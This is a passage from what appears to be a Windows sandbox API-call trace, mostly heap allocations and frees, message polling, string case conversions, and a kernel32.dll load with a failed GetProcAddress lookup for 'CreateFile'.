lpNumberOfBytesWritten=0x6aee3c*=0x4d, lpOverlapped=0x0) returned 1 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.190] CloseHandle (hObject=0x128) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.192] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.192] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.192] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.192] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.193] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.196] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.199] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8891f0 [0039.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8891f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.199] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.199] HeapFree (in: 